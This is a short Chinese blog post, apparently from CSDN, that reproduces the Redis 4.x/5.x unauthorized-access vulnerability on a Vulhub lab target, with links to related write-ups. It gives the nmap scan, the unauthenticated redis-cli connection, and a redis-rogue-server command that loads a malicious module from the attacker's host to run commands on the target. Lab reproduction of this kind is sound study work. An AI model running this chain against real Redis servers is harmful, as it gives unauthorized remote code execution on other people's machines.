【redis漏洞复现】4-unacc未授权访问漏洞

最新推荐文章于 2023-09-28 17:21:17 发布
最新推荐文章于 2023-09-28 17:21:17 发布
阅读量938 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: redis 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120029629
版权

4-unacc:

1.nmap探测一下靶机端口,redis服务正常开启了,在6379端口

nmap 192.168.225.139 -p 1-65535

2.kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息,证明存在未授权访问漏洞

redis-cli -h 192.168.225.139

3.使用网上的脚本,在redis-rogue-server.py / 目录下

输入命令,成功GETSHELL并执行了ls的命令:

./redis-master.py -r 192.168.225.139 -p 6379 -L 192.168.225.133 -P 8989 -f RedisModulesSDK/exp/exp.so -c "whoami"

malloc_冲!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis 4.x5.x 授权访问漏洞EXP复现过程
桜的博客
03-29 846
本次使用Vulhub一键搭建漏洞测试靶场 地址:https://vulhub.org/#/environments/redis/4-unacc/ 搭建过程就不讲了 可以看到已经启动docker了 Nmap探测一下靶机端口 如上图所示,redis服务正常开启了,在6379端口 kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息 然后将exp gi...
Redis-4-unacc授权访问漏洞复现(一看就会)
最新发布
m0_69043895的博客
04-24 902
Redis是一个开源的内存数据库,它以键值对的方式存储数据。以下是关于 Redis 的主要特点和用途:内存存储,键值存储,持久性,数据结构支持。默认端口为6379。Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问
4-unacc漏洞复现
qq_42640780的博客
08-14 850
原本看到了redis的4-unuac授权漏洞,想要复现一下的,结果使用vulhub进行复现的时候,只能进行授权访问,却无法利用其提权的功能,所以必须要自己安装redis,如果想要实现传马,提权等操作安装redis需要7.0版本以下的,要不然会有保护机制(目前研究的是这样,最新版的不给权限去提权)安装redis,这个地方我下载使用的是6.0.3版本的下载好之后,进行解压安装进入到你解压的redis目录下,然后修改redis.conf内的配置将bind修改成0.0.0.0全网监听。...
redis授权访问(4-unacc
qq_56289291的博客
07-07 1184
漏洞复现
4-unaccredis授权访问)vulhub复现
qq_52279315的博客
05-18 331
vulhub靶场复现redis
【vulhub漏洞复现redis 4-unacc 授权访问漏洞
RexHa的博客
03-03 4687
一、漏洞详情Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
【4-unaccredis授权访问漏洞
liuxiaoning_的博客
09-28 203
复现并分析【4-unaccredis授权访问漏洞,通过该漏洞利用多种方式达到反弹shell的效果。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis稳定版 Redis-x64-5.0.14.1.zip
07-21
4. 使用`redis-cli`连接服务器并进行测试。 在实际应用中,开发者可以根据业务需求,选择合适的数据结构,利用Redis的特性优化系统性能,如使用List作为消息队列,Set实现交集、并集和差集操作,Sorted Set进行范围...
Redis-x64-5.0.14.msi和Redis-x64-5.0.14.zip
12-20
另一方面,`.zip`文件是常见的文件压缩格式,`Redis-x64-5.0.14.zip`包含的是经过Windows Installer打包的Redis文件。解压后,你可以找到包括`redis-server.exe`、`redis-cli.exe`等在内的可执行文件,以及配置...
BUUCTF笔记之Real部分WP(二)
克格莫
06-04 677
很久没有打Real部分了,今天续上 1.[struts2]s2-048
Redis 4.x/5.x 授权访问漏洞
roukmanx的博客
12-24 1326
本次对Redis授权访问漏洞的利用过程做个简单的记录。 前言: 在2019年7月7日结束的WCTF2019 Final上,LCBC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,这种利用方式更为通用,危害也更大,因此来学习学习 https://2018.zeronights.ru/wp-content/uploads/materials/15-redi...
Redis 4.x/5.x 授权访问漏洞+getShell漏洞复现
CNXBDSa的博客
11-26 2950
背景环境 Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 复现地址 复现地址 vulhub/redis/4-unacc 脚本检测 redis 授权批量检测工具脚本,该脚本支持弱口令检测 #!/usr/bin/python2 # -*- coding: utf-8 -*- import socket import sys def check(ip, port, timeout): try:
Redis授权访问利用RCE进行漏洞复现
三天不打上房揭瓦的博客
12-22 1848
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 目录漏洞概述影响版本环境搭建和漏洞复现1.环境启动2.下载使用RCE漏洞防御 漏洞概述 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导
Redis授权访问漏洞详解与防护策略
主要内容涉及到Redis服务器的配置和安全性问题,包括暴露在公网上的Redis实例、默认配置的漏洞以及如何利用这些漏洞进行授权访问。此外,还提到了Webshell的使用,并给出了相关工具如RedisClient和Redis下载链接,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值